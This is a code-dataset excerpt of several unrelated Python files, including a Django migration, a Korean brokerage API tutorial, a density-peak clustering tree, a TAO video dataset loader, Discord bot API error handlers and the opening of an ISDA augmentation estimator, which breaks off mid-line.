max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
---|---|---|---|---|---|---|
project1/budget/migrations/0005_delete_hiddenstatus_budget.py | sujeethiremath/Project-1 | 0 | 5000 | # Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| 1.140625 | 1 |
tutorial/43.py | mssung94/daishin-trading-system | 2 | 5001 | # Daishin Securities API
# Example comparing the two ways of requesting data: BlockRequest vs. Request
# There are broadly two ways to request data through the Plus API:
#
# BlockRequest - the simplest way to request and receive data
# Request      - call Request, then receive the data through the Received event
#
# The code below is an example that lets you compare the two approaches.
# For ordinary data requests, BlockRequest is the simplest.
# However, BlockRequest also pumps messages internally, so if real-time quotes arrive
# before that call finishes, or another event triggers a re-entrant call, the call can fail.
# If you need to communicate while receiving complex real-time quotes, use the Request approach.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
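# auto-reset Win32 event (bManualReset=0), initially non-signaled; OnReceived sets it to stop the message pump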
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
        self.client = client  # CP real-time communication object
        self.name = name  # name used to tell apart events from different services
        self.caller = caller  # kept for the callback
def OnReceived(self):
        # real-time handling - current price / order execution
        if self.name == 'stockmst':
            print('received')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
            0,  # wait for all = False, so it returns when any one of them is signaled
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('Data received via BlockRequest')
item = {}
item['stock name'] = g_objCodeMgr.CodeToName(code)
item['current price'] = objStockMst.GetHeaderValue(11)  # closing price
item['change'] = objStockMst.GetHeaderValue(12)  # change vs. previous day
print(item)
print('')
##############################################################
# 2. Request ==> message pump ==> receive the OnReceived event
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['stock name'] = g_objCodeMgr.CodeToName(code)
item['current price'] = objStockMst.GetHeaderValue(11)  # closing price
item['change'] = objStockMst.GetHeaderValue(12)  # change vs. previous day
print(item)
| 2.21875 | 2 |
ADPTC_LIB/DPTree_ST.py | SuilandCoder/ADPTC_LIB | 0 | 5002 | <filename>ADPTC_LIB/DPTree_ST.py<gh_stars>0
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time
def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
    '''
    dc_eps: density_connectivity threshold
    Split clusters using the direct parent-child distance together with the
    connectivity distance between a child node and its sibling nodes;
    use the mean density to separate outliers.
    Returns:
        outlier_forest
        cluster_forest
    '''
mean_density = np.mean(local_density)
outlier_forest = {}
cluster_forest = {}
uncertain_forest = {}
not_direct_reach = []
    #* find the points that are not directly reachable:
for k in range(len(closest_denser_nodes_id)):
near_nodes = mixin_near_matrix[k]
if closest_denser_nodes_id[k] not in near_nodes:
not_direct_reach.append(k)
pass
not_direct_reach = np.array(not_direct_reach)
# not_direct_reach = np.where(closest_dis_denser>eps)[0]
    #* arrange the not-directly-reachable points by tree depth:
# not_direct_reach = np.array(not_direct_reach)
depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
for i in range(len(not_direct_reach)):
# depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
pass
not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
    #* treat the list as a stack: deeper nodes are processed first
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
while(len(not_direct_reach)>0):
        #* check connectivity: the distance must be below the threshold and the density above the subtree's mean density
node_id = not_direct_reach.pop()
if(node_id==129193 or node_id==61589 or node_id == 123593):
print(node_id)
if node_id in tree.sorted_gamma_index[0:10]:
cluster_forest[node_id] = tree.remove_subtree(node_id)
continue
node = tree.node_dir[node_id]
parent_id = node.parent_id
parent_node = tree.node_dir[parent_id]
children = parent_node.getChildren()
        siblings_reliable = [ i for i in children if i not in not_direct_reach] #* sibling nodes, excluding the not-directly-reachable ones
not_reliable_nodes = [i for i in children if i not in siblings_reliable]
if node_id in not_reliable_nodes:
not_reliable_nodes.remove(node_id)
if node_id in siblings_reliable:
siblings_reliable.remove(node_id)
pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
if len(pairs_nodes)==0:
if(node_id==tree.root_node.node_id):
continue
if(local_density[node_id]-mean_density*dc_eps)>=0:
                #* get the number of descendants:
offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
if(len(offspring_id)<local_density[node_id]):
uncertain_forest[node_id] = tree.remove_subtree(node_id)
pass
else:
cluster_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
else:
outlier_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
pass
    end = time.perf_counter()
    print('Tree splitting took %s' % str(end - start))
    cluster_forest[tree.root_node.node_id] = tree #* add the tree rooted at the root node
return outlier_forest, cluster_forest, uncertain_forest
def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
    '''
    cur_node: the node whose connectivity to the parent is being judged;
    reliable_nodes: sibling nodes that are directly connected to the parent;
    not_reliable_nodes: sibling nodes that are not directly connected to the parent but may be connected indirectly;
    Connectivity judgment scheme:
    1. Check whether cur_node can reach the reliable_nodes; if so, return; otherwise go to 2;
    2. Check whether cur_node can reach the not_reliable_nodes (say [a,b,c,d,e]); if it reaches [a,b,c] but not [d,e], go to 3;
    3. Loop over [a,b,c] and recursively call this method: is_connected_entropy(..., cur_node_id=[a], reliable_nodes, not_reliable_nodes=[b,c,d,e])
    '''
#* 1.
if(len(reliable_nodes)==0):
return []
for reliable_node_id in reliable_nodes:
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
if(len(pairs_nodes)==0):
continue
# return pairs_nodes
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
pass
#* 2.
for i in range(len(not_reliable_nodes)):
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
else:
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
# return pairs_nodes
            # #* if the mean density of the connected points exceeds the local-density threshold, update the maximum similarity
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
# pass
return []
def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
    '''
    Label the sample points in the forests;
    also handles the assignment of the uncertain points.
    '''
labels = np.full((node_num),-1,dtype=np.int32)
for outlier_id in outlier_forest:
outlier_tree = outlier_forest[outlier_id]
outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
labels[outlier_idlist] = -1
pass
label = 0
for tree_id in cluster_forest:
cluster_tree = cluster_forest[tree_id]
cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
labels[cluster_idlist] = label
label = label + 1
pass
    #todo revise this code
for uncertain_tree_id in uncertain_forest:
uncertain_tree = uncertain_forest[uncertain_tree_id]
uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
all_near_nodes = np.array([],dtype=np.int32)
for node_id in uncertain_nodes_id:
all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
pass
# all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
all_near_nodes = np.unique(all_near_nodes)
all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
if(len(counts)==0):
cur_label = -1
else:
cur_label = unique_labels[np.argmax(counts)]
labels[uncertain_nodes_id]=cur_label
pass
core_points = cluster_forest.keys()
return labels,core_points
'''
Density peak tree;
builds a DPTree from the local density, the distance to the nearest
higher-density neighbor, and the decision metric produced by the CFSFDP algorithm.
'''
class Node():
def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]):
self.node_id = node_id
self.attr_list = attr_list
self.parent_id = parent_id
self.dist_to_parent = dist_to_parent
self.density = density
self.children = children
self.gamma = gamma
self.offspring_num = None
self.lvl = None
def addChild(self,child):
self.children+=[child]
def removeChild(self,child):
self.children.remove(child)
def resetChildren(self):
self.children = []
def setParentId(self,parent_id):
self.parent_id = parent_id
def setOffspringNum(self,num):
self.offspring_num = num
def setLvl(self,lvl):
self.lvl = lvl
def getAttr(self):
return self.attr_list
def getNodeId(self):
return self.node_id
def getParentId(self):
return self.parent_id
def getDistToParent(self):
return self.dist_to_parent
def getDensity(self):
return self.density
def getGamma(self):
return self.gamma
def getChildren(self):
return self.children
def hasChildren(self,child_id):
if child_id in self.children:
return True
else:
return False
def getOffspringNum(self):
return self.offspring_num
def getLvl(self):
return self.lvl
class DPTree():
def __init__(self):
self.node_count = 0
self.node_dir = {}
self.root_node = None
self.node_offspring = {}
self.sorted_gamma_index = None
pass
def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma):
        #* create nodes in the order of the sorted gamma
node_dir = {}
node_created = np.zeros(len(sorted_gamma_index))
self.sorted_gamma_index = sorted_gamma_index
for i in range(len(sorted_gamma_index)):
node_id = sorted_gamma_index[i]
            parent_id = closest_node_id[node_id] #* closest_node_id was obtained from the sorted gamma
attr_list = X[node_id]
dist_to_parent = closest_dis_denser[node_id]
density = local_density[node_id]
if(node_created[node_id]==0):
                node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma=gamma[node_id],children=[])
node_created[node_id] = 1
node_dir[node_id] = node
node_dir[node_id].setParentId(parent_id)
if(node_created[parent_id]==0):
parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[])
node_created[parent_id] = 1
node_dir[parent_id] = parent_node
parent_node = node_dir[parent_id]
cur_node = node_dir[node_id]
            if(node_id != parent_id):#* non-root node
parent_node.addChild(node_id)
# parent_lvl = parent_node.getLvl()
# cur_node.setLvl(parent_lvl+1)
else:
if(parent_node.getLvl()==None):
parent_node.setLvl(0)
        #* set node level information
# for i in tree.node_dir:
# pass
self.root_node = node_dir[sorted_gamma_index[0]]
self.node_dir = node_dir
self.node_count = len(sorted_gamma_index)
pass
def printTree2(self,parent_id,spaceStr=''):
for node_id in self.node_dir:
if(node_id==self.root_node.node_id):
continue
node = self.node_dir[node_id]
if(node.parent_id==parent_id):
print(spaceStr, node.node_id, sep = '')
self.printTree2(node.node_id,spaceStr+' ')
pass
def calcu_subtree_offspring_num(self,node_id):
node = self.node_dir[node_id]
cur_offsprings = node.getOffspringNum()
if(cur_offsprings!=None):
return cur_offsprings
child_num = len(node.children)
if(child_num==0):
return 0
for i in node.children:
cur_offsprings = self.calcu_subtree_offspring_num(i)
child_num+=cur_offsprings
node.setOffspringNum(child_num)
return child_num
def get_subtree_offspring_id(self,node_id,other_idlist):
        '''
        Get the node_id of every descendant.
        Consider: should this be cached as a node attribute?
        '''
def fn_get_subtree_offspring_id(node_id,offspring_idlist):
if(node_id in self.node_offspring.keys()):
return self.node_offspring[node_id]
else:
node = self.node_dir[node_id]
children = node.getChildren()
child_num = len(children)
if(child_num==0):
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist= list(offspring_idlist) + children
for i in children:
child_offspring_idlist = fn_get_subtree_offspring_id(i,[])
self.node_offspring[i] = child_offspring_idlist
offspring_idlist= list(offspring_idlist) + child_offspring_idlist
pass
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist = fn_get_subtree_offspring_id(node_id,[])
return np.array(list(offspring_idlist) + other_idlist)
def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser):
p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id])
p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum
entropy = -1*np.sum(p*np.log2(p))
        #* return 0 when there is only one point
if(entropy==0):
return 0
return entropy/(-1*np.log2(1/(len(offspring_id))))
def remove_subtree(self,child_id):
        '''
        Remove the subtree rooted at child_id; the removed subtree becomes a new tree and is returned.
        1. Update self.node_dir and self.node_count
        2. Update the children[] of the parent node and the offspring_num of all ancestors
        3. Build the new tree
        '''
# print("删除子节点:",child_id)
offspring_id = self.get_subtree_offspring_id(child_id,[child_id])
offspring_len = len(offspring_id)
node_id = self.node_dir[child_id].parent_id
node = self.node_dir[node_id]
node.removeChild(child_id)
self.node_count = self.node_count-offspring_len
        #* drop the removed nodes from the cached descendant lists
if(node_id in self.node_offspring.keys()):
for node_to_delete in offspring_id:
self.node_offspring[node_id].remove(node_to_delete)
print("删除子孙节点:",node_to_delete)
pass
pass
# cur_id = child_id
# parent_id = node_id
        # #* update the ancestors' offspring_num:
# while(cur_id!=parent_id):
# parent_node = self.node_dir[parent_id]
# if(parent_node.getOffspringNum()!=None):
# parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len)
# cur_id = parent_id
# parent_id = parent_node.parent_id
# pass
        #* update self.node_dir and build the new tree:
new_tree = DPTree()
for i in offspring_id:
removed_node = self.node_dir.pop(i)
new_tree.node_dir[i] = removed_node
pass
new_tree.node_count = offspring_len
new_tree.root_node = new_tree.node_dir[child_id]
new_tree.root_node.setParentId(child_id)
return new_tree
def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps):
        '''
        Compute the connectivity distance between two subtrees.
        return:
            1. the shortest distance
            2. the set of points whose distance is below the threshold eps
        '''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = float('inf')
for i in offspring_two:
tmp_dist = np.min(dist_mat[i][offspring_one])
if(tmp_dist<dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix):
        '''
        Compute the neighboring points between two subtrees.
        return:
            the neighboring point pairs
            all neighboring points
        '''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
pairs_nodes = []
for i in offspring_two:
connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one)
if len(connected_nodes_index)>0:
for j in connected_nodes_index:
pairs_nodes.append([i,j])
pass
pass
if(len(pairs_nodes)==0):
return pairs_nodes,connected_nodes
return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten())
def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps):
        '''
        Compute the connectivity (similarity) distance between two subtrees.
        return:
            1. the maximum similarity distance
            2. the set of points whose similarity is at or above the threshold eps
        '''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = -1
for i in offspring_two:
tmp_dist = np.max(dist_mat[i][offspring_one])
if(tmp_dist>=dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_depth(self,node_id, depth):
node = self.node_dir[node_id]
parent_id = node.parent_id
if(node_id==parent_id):
return depth
else:
return self.calcu_depth(parent_id,depth+1)
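if __name__ == '__main__':
    #* A minimal synthetic sketch of how a DPTree is assembled and inspected.
    #* The densities/distances below are made up for illustration; they are not real CFSFDP output.
    X = np.array([[0.0, 0.0], [1.0, 0.0], [1.5, 0.5]])
    local_density = np.array([3.0, 2.0, 1.0])
    closest_node_id = np.array([0, 0, 1])           # nearest denser neighbor of each point (the root points to itself)
    closest_dis_denser = np.array([9.9, 1.0, 0.7])  # distance to that neighbor
    gamma = local_density * closest_dis_denser      # decision metric
    sorted_gamma_index = np.argsort(-gamma)         # root (largest gamma) first
    tree = DPTree()
    tree.createTree(X, sorted_gamma_index, closest_node_id, closest_dis_denser, local_density, gamma)
    tree.printTree2(tree.root_node.node_id)
    print(tree.get_subtree_offspring_id(tree.root_node.node_id, [tree.root_node.node_id]))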
| 2.375 | 2 |
datasets/tao/tao.py | Nik-V9/AirObject | 9 | 5003 | <reponame>Nik-V9/AirObject
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output) | 2.609375 | 3 |
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py | The-CJ/Phaazebot | 2 | 5004 | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel does not exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel does not exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| 2.4375 | 2 |
augmentation/ISDA.py | RichardScottOZ/sota-data-augmentation-and-optimizers | 31 | 5005 | import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
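        # Incremental per-class statistics: the batch mean/covariance are computed
        # class-by-class through a one-hot mask, then blended into the running
        # Ave/CoVariance with weights proportional to the per-class sample counts.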
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
